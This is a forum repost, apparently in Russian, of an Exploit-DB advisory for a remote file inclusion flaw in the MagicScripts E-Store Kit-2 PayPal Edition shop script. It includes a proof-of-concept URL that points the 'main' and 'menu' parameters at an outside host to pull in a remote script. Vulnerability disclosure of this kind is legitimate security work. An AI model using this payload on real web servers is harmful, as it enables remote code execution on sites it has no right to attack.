Exploit MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25286
Проверка EDB
  1. Пройдено
Автор
DCRAB
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-03-26
Код:
source: https://www.securityfocus.com/bid/12910/info

MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability.

Remote attackers could potentially exploit this issue to include a remote malicious PHP script. If the attacker is able to execute the remote script it would execute in the context of the Web server hosting the vulnerable application. 

http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com
 
Источник
www.exploit-db.com

Похожие темы